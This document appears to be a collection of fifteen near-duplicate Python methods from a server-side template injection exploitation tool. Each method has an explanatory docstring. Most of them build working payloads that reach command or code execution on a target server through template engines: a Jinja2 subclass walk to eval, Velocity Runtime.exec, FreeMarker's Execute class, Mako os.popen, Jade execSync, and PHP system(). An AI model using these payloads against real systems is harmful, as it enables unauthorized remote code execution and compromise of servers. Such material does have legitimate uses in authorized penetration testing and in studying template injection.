Example #1
    def evaluate(self, code):
        """Wrap *code* in a template payload and submit it via ``self.inject``.

        The template stores the quoted code in ``d``, iterates the subclasses
        of the base class of ``[]``, selects the one named ``catch_warnings``,
        scans ``__init__.func_globals`` for a dict holding an ``eval`` key and
        renders the result of calling that entry on ``d``.

        Args:
            code: Expression text; it is passed through ``quote`` before being
                placed inside the double-quoted ``set`` value.

        Returns:
            Whatever ``self.inject`` returns for the rendered payload.

        NOTE(review): ``quote`` is defined outside this block and is the only
        escaping applied -- confirm it covers the double-quoted context.
        NOTE(review): the walk needs dunder attribute access from inside the
        template; presumably an engine sandbox that denies it makes this check
        come back negative -- confirm against the target engine.
        """
        template = """{%% set d = "%s" %%}{%% for c in [].__class__.__base__.__subclasses__() %%} {%% if c.__name__ == 'catch_warnings' %%}
{%% for b in c.__init__.func_globals.values() %%} {%% if b.__class__ == {}.__class__ %%}
{%% if 'eval' in b.keys() %%}
{{ b['eval'](d) }}
{%% endif %%} {%% endif %%} {%% endfor %%}
{%% endif %%} {%% endfor %%}""" % (quote(code))
        return self.inject(template)
Example #2
    def evaluate(self, code):
        """Send *code* to ``self.inject`` inside a subclass-walking template.

        The rendered template binds the quoted code to ``d``, loops over
        ``[].__class__.__base__.__subclasses__()`` until it meets the class
        named ``catch_warnings``, looks through the values of its
        ``__init__.func_globals`` for a dict that contains ``'eval'`` and
        prints ``b['eval'](d)``.

        Args:
            code: Expression text, escaped with ``quote`` before formatting.

        Returns:
            The value returned by ``self.inject``.

        NOTE(review): ``quote`` comes from outside this block; its escaping
        rules are not visible here -- verify them against the double-quoted
        string the value lands in.
        """
        quoted = quote(code)
        payload = """{%% set d = "%s" %%}{%% for c in [].__class__.__base__.__subclasses__() %%} {%% if c.__name__ == 'catch_warnings' %%}
{%% for b in c.__init__.func_globals.values() %%} {%% if b.__class__ == {}.__class__ %%}
{%% if 'eval' in b.keys() %%}
{{ b['eval'](d) }}
{%% endif %%} {%% endif %%} {%% endfor %%}
{%% endif %%} {%% endfor %%}""" % (quoted)
        return self.inject(payload)
Example #3
    def execute(self, command):
        """Submit a template that runs *command* and renders its output.

        The template (it looks like Apache Velocity syntax -- confirm against
        the enclosing class) resolves ``java.lang.String``,
        ``java.lang.Character`` and ``java.lang.Runtime`` through
        ``$class.inspect``, calls ``getRuntime().exec`` with the quoted
        command, waits for it, and then reads the process input stream one
        character at a time for ``$out.available()`` iterations.

        Args:
            command: Command line; escaped with ``quote`` before it is placed
                inside the double-quoted ``exec`` argument.

        Returns:
            Whatever ``self.inject`` returns for the rendered payload.
        """
        # The original author tested the techniques described in
        # http://blog.portswigger.net/2015/08/server-side-template-injection.html
        # and reports that they did not work; the check stays active to cover
        # previously affected versions.
        quoted = quote(command)
        return self.inject("""#set($str=$class.inspect("java.lang.String").type)
#set($chr=$class.inspect("java.lang.Character").type)
#set($ex=$class.inspect("java.lang.Runtime").type.getRuntime().exec("%s"))
$ex.waitFor()
#set($out=$ex.getInputStream())
#foreach($i in [1..$out.available()])
$str.valueOf($chr.toChars($out.read()))
#end""" % (quoted))
Example #4
    def execute(self, command):
        """Run *command* through a ``$class.inspect``-based template.

        The payload obtains the String, Character and Runtime types with
        ``$class.inspect(...).type``, starts the quoted command with
        ``Runtime.getRuntime().exec``, calls ``waitFor()`` and echoes the
        bytes of ``getInputStream()`` via ``$str.valueOf($chr.toChars(...))``.

        Args:
            command: Command line, passed through ``quote`` first.

        Returns:
            The result of ``self.inject`` for the formatted template.

        NOTE(review): this depends on ``$class`` being exposed in the template
        context -- presumably a tools-context setting; confirm.
        """
        # Author's note: the techniques from
        # http://blog.portswigger.net/2015/08/server-side-template-injection.html
        # were tested and did not work. The check is kept active anyway so
        # that previously affected versions are still covered.
        payload = """#set($str=$class.inspect("java.lang.String").type)
#set($chr=$class.inspect("java.lang.Character").type)
#set($ex=$class.inspect("java.lang.Runtime").type.getRuntime().exec("%s"))
$ex.waitFor()
#set($out=$ex.getInputStream())
#foreach($i in [1..$out.available()])
$str.valueOf($chr.toChars($out.read()))
#end""" % (quote(command))
        return self.inject(payload)
Example #5
    def execute(self, command):
        """Run *command* by passing an ``os.popen`` expression to ``self.evaluate``.

        Args:
            command: Command line; escaped with ``quote`` and placed inside the
                double-quoted ``popen`` argument.

        Returns:
            Whatever ``self.evaluate`` returns for the built expression.

        NOTE(review): ``quote`` is defined outside this block -- its escaping
        is the only thing separating ``command`` from the surrounding Python
        string literal; confirm it handles double quotes and backslashes.
        """
        return self.evaluate('__import__("os").popen("%s").read()' % quote(command))
Example #6
    def execute(self, command):
        """Run *command* via a template that instantiates ``Execute``.

        The template assigns ``"freemarker.template.utility.Execute"?new()``
        to ``ex`` and interpolates ``ex("<quoted command>")``.

        Args:
            command: Command line, escaped with ``quote`` before formatting.

        Returns:
            Whatever ``self.inject`` returns for the payload.

        NOTE(review): this relies on the ``?new`` built-in being allowed to
        instantiate that class; presumably a restrictive class resolver on the
        engine side blocks it -- confirm.
        """
        payload = """<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("%s") }""" % (quote(command))
        return self.inject(payload)
Example #7
    def execute(self, command):
        """Build an ``Execute``-based template around *command* and inject it.

        Args:
            command: Command line; run through ``quote`` and placed inside the
                double-quoted argument of ``ex(...)``.

        Returns:
            The value returned by ``self.inject``.
        """
        quoted = quote(command)
        template = """<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("%s") }"""
        return self.inject(template % (quoted))
Example #8
    def execute(self, command):
        """Turn *command* into an ``os.popen(...).read()`` expression and evaluate it.

        Args:
            command: Command line, escaped with ``quote`` first.

        Returns:
            The result of ``self.evaluate`` on the generated expression.
        """
        quoted = quote(command)
        expression = '__import__("os").popen("%s").read()' % quoted
        return self.evaluate(expression)
Example #9
 def execute(self, code, prefix = None, suffix = None, blind = False):
     """Quote *code*, then delegate to the parent class's ``execute``.

     Args:
         code: Text to run; passed through ``quote`` before submission.
         prefix: Forwarded unchanged to the parent implementation.
         suffix: Forwarded unchanged to the parent implementation.
         blind: Forwarded unchanged to the parent implementation.

     Returns:
         Whatever the parent ``execute`` returns.
     """
     quoted = quote(code)
     parent = super(Jade, self)
     return parent.execute(quoted, prefix, suffix, blind)
Example #10
    def execute(self, command):
        """Inject a template line that runs *command* with ``execSync``.

        The payload is an ``=`` output line that reaches ``child_process``
        through ``global.process.mainModule.require`` and calls ``execSync``
        on the quoted command.

        Args:
            command: Command line, escaped with ``quote`` before formatting.

        Returns:
            Whatever ``self.inject`` returns for the payload.
        """
        return self.inject(
            """= global.process.mainModule.require('child_process').execSync("%s")""" % quote(command)
        )
Example #11
    def execute(self, command):
        """Inject a template block that runs *command* with ``os.popen``.

        After formatting, the payload is a ``<% ... %>`` code block that
        imports ``os`` and stores the output of ``os.popen`` on the quoted
        command in ``x``, followed by ``${x}`` to render it.

        Args:
            command: Command line, escaped with ``quote`` before formatting.

        Returns:
            Whatever ``self.inject`` returns for the payload.
        """
        payload = """<%% import os; x=os.popen("%s").read() %%>${x}""" % (quote(command))
        return self.inject(payload)
Example #12
    def execute(self, command):
        """Run *command* by evaluating a ``system("...");`` statement.

        Args:
            command: Command line; escaped with ``quote`` and placed inside the
                double-quoted ``system`` argument.

        Returns:
            Whatever ``self.evaluate`` returns for the statement.
        """
        statement = """system("%s");""" % (quote(command))
        return self.evaluate(statement)
Example #13
    def execute(self, command):
        """Format an ``execSync`` template line around *command* and inject it.

        Args:
            command: Command line, passed through ``quote`` before it is put
                inside the double-quoted ``execSync`` argument.

        Returns:
            The value returned by ``self.inject``.
        """
        quoted = quote(command)
        template = """= global.process.mainModule.require('child_process').execSync("%s")"""
        return self.inject(template % quoted)
Example #14
 def execute(self, command):
     """Wrap *command* in ``system("...");`` and hand it to ``self.evaluate``.

     Args:
         command: Command line, escaped with ``quote`` first.

     Returns:
         The result of ``self.evaluate``.
     """
     quoted = quote(command)
     return self.evaluate("""system("%s");""" % (quoted))
Example #15
 def evaluate(self, code, prefix = None, suffix = None, blind = False):
     """Quote *code*, then delegate to the parent class's ``evaluate``.

     Args:
         code: Expression text; passed through ``quote`` before submission.
         prefix: Forwarded unchanged to the parent implementation.
         suffix: Forwarded unchanged to the parent implementation.
         blind: Forwarded unchanged to the parent implementation.

     Returns:
         Whatever the parent ``evaluate`` returns.
     """
     quoted = quote(code)
     parent = super(Jinja2, self)
     return parent.evaluate(quoted, prefix, suffix, blind)